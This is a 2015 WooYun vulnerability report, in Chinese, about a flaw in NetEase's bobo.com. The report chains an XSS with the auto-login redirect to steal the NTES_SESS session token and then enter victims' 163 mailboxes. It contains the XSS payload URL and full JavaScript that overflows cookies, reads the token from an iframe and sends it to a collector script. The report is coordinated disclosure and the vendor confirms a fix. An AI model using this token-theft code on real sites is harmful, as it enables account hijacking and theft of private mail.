当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148110

漏洞标题:网易用户登陆状态下点我的链接我就可进入其邮箱、云笔记等服务(不支持某些版本IE)

相关厂商:网易

漏洞作者: 呆子不开口

提交时间:2015-10-20 17:38

修复时间:2015-12-05 17:34

公开时间:2015-12-05 17:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

这里天网传网易密码泄漏,我赶紧去改了下我的密码。改完后继续留在网易冲浪,发现一个很妙的地方,可以看女人跳舞。我年纪也不小了,于是开心的看了起来
看着女主播的舞蹈,我上下半身忍不住齐思考,发现......网易的用户在登陆状态下点我的链接,我就可进入其网易邮箱、云笔记、花田等网易服务。chrome、火狐、edge都能中招。IE某些版本默认显示友好HTTP错误,所以不支持某些IE版本

详细说明:

这里天网传网易密码泄漏,我赶紧去改了下我的密码。改完后继续留在网易冲浪,发现一个很妙的地方,叫bobo
bobo.com是网易旗下的一个网站,一个看女人的网站,一个看女人跳舞的网站。我年纪也不小了,于是开心的看了起来
看着视频里的女主播的舞蹈,我上下半身都忍不住思考,发现bobo的自动登陆有点问题
网易用户登陆状态下,再访问www.bobo.com,会自动登陆bobo。自动登陆流程如下
先跳到163去请求登陆,如下

http://bobo.163.com/checkAuth?url=http://www.bobo.com/&


163那边再返回认证凭证NTES_SESS,上面的请求会302跳转到如下请求

http://www.bobo.com/auth?NTES_SESS=eVDnHhKqQ5phQfq.SUhKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX0Fz3t.Al2XXgmlY5D8B6zOijFOLH5QM2JXXXXXXXXXXXXLpu7_yJRQLaO0UEF8WpHDS1qJ4_Wmt8qKDG0QHAMnsgcZsae_Af0Ow.65B4BcoDsu9xS1v45ORinZLH&url=http://www.bobo.com/&


最后302跳回到首页,设置完登陆cookie,认证成功
跳回

http://www.bobo.com/


所以,只要偷到NTES_SESS即可,对我来说,需要一个www.bobo.com的XSS即可
我戴上眼镜,发现了一个,是js里的xss,完美的不搭理xss filter。如下

http://www.bobo.com/anchor/upload?functionName=memberShipUpload=null;alert(1);aaa


下面用xss来偷登陆流程中的NTES_SESS
有xss后,就可以在www.bobo.com域执行js了。先用js设置个超长cookie(一会会有用)
然后嵌入一个iframe去请求http://bobo.163.com/checkAuth?url=http://www.bobo.com/&,会302跳转到
http://www.bobo.com/auth?NTES_SESS=eVDnHhKqQ5phQfq.SUhKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX0Fz3t.Al2XXgmlY5D8B6zOijFOLH5QM2JXXXXXXXXXXXXLpu7_yJRQLaO0UEF8WpHDS1qJ4_Wmt8qKDG0QHAMnsgcZsae_Af0Ow.65B4BcoDsu9xS1v45ORinZLH&url=http://www.bobo.com/&
这个时候由于我们设置了超长cookie,所以此请求会失败无法继续跳转
这时,我们通过iframe.contentWindow.location.href来读取iframe当前加载的url,就可以获取到url里的NTES_SESS值了
代码如下:

for (i = 0; i < 20; i++) {
    document.cookie = i + '=' + repeatt('X', 2000) + ';path=/auth';
}
var iframe =document.createElement('iframe');
iframe.src="http://bobo.163.com/checkAuth?url=http://www.bobo.com/&";
iframe.addEventListener('load', function(){
var	ntes = iframe.contentWindow.location.href;
var img1 =document.createElement('img');
img1.src = "http://127.0.0.1/163img.php?r="+encodeURIComponent(ntes);
for (i = 0; i < 20; i++) {
    document.cookie = i + '=' + repeatt('X', 1) + ';path=/auth';
}
}, false);
document.body.appendChild(iframe);


此方法不支持某些版本的IE,因为IE在超长cookie访问后发现是400错误后,显示的是自己本地的HTML,所以xss无权限读取到当前iframe的url
获取到NTES_SESS后,可以替换自己登陆账号里的ntes_sess,可以进入网易的服务。youdao域下的也一样。
修改完cookie后,可以通过如下请求
http://entry.mail.163.com/coremail/fcg/ntesdoor2?lightweight=1&verifycookie=1&language=-1&style=-1&from=newmsg_www&df=ydweb
进入用户邮箱

漏洞证明:

收到的用户ntes_sess

QQ截图20151020162241.png


示例1

QQ截图20151020161101.png


示例2

QQ截图20151020161613.png

修复方案:

修复xss
自动登陆架构需要改进,具体方案这里就不细说

版权声明:转载请注明来源 呆子不开口@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-21 17:33

厂商回复:

漏洞已修复,谢谢您对网易产品的关注。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-20 17:41 | xsser 认证白帽子 ( 普通白帽子 | Rank:267 漏洞数:20 | 当我又回首一切,这个世界会好吗?)

    后面是败笔

  2. 2015-10-20 17:43 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1234 漏洞数:122 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    把呆子给引出来了....

  3. 2015-10-20 17:47 | px1624 ( 普通白帽子 | Rank:1038 漏洞数:177 | px1624)

    这个和宝宝的哪个更吊点?诶,专业补刀啊~

  4. 2015-10-20 17:49 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1234 漏洞数:122 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @px1624 不知道 我的那个不会过期 也没浏览器限制

  5. 2015-10-20 17:54 | 浮萍 ( 普通白帽子 | Rank:658 漏洞数:135 | 290)

    点链接系列

  6. 2015-10-20 17:55 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    女主播的舞蹈有跨站风险

  7. 2015-10-20 17:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:267 漏洞数:20 | 当我又回首一切,这个世界会好吗?)

    @子非海绵宝宝 你的略胜一筹

  8. 2015-10-20 18:00 | 随风的风 ( 普通白帽子 | Rank:170 漏洞数:56 | 微信公众号:233sec 不定期分享各种漏洞思...)

    女主播的舞蹈有跨站风险

  9. 2015-10-20 18:11 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    网易近期火爆啊!

  10. 2015-10-20 18:21 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    洞主小心咯,可能女主播就是黑阔注入的女性病毒,专门色诱你的~

  11. 2015-10-20 18:41 | Mieless ( 实习白帽子 | Rank:33 漏洞数:9 | 我是来打酱油的。)

    谁蹲下一个

  12. 2015-10-20 19:23 | k0_pwn ( 路人 | Rank:2 漏洞数:2 | 专注二进制许多年,突然觉得web才好玩)

    哈哈哈,段子手!

  13. 2015-10-21 09:34 | 小荷才露尖尖角 ( 普通白帽子 | Rank:111 漏洞数:14 | less is more)

    上下半身齐思考,洞主好厉害!

  14. 2015-10-21 12:58 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1109 漏洞数:143 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    上下半身齐思考....下半身就够了

  15. 2015-10-21 17:59 | 呆子不开口 ( 普通白帽子 | Rank:337 漏洞数:27 | 求各种兼职)

    5rank...

  16. 2015-10-21 18:09 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1234 漏洞数:122 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @呆子不开口 不知道我多少好紧张

  17. 2015-10-21 18:14 | 呆子不开口 ( 普通白帽子 | Rank:337 漏洞数:27 | 求各种兼职)

    @子非海绵宝宝 你应该20,但我说的肯定不公正,详情发我,我给你个最公正的评价

  18. 2015-10-27 12:52 | 八戒 ( 路人 | Rank:17 漏洞数:3 | ~~鬼畜之王~~)

    我是来看舞蹈的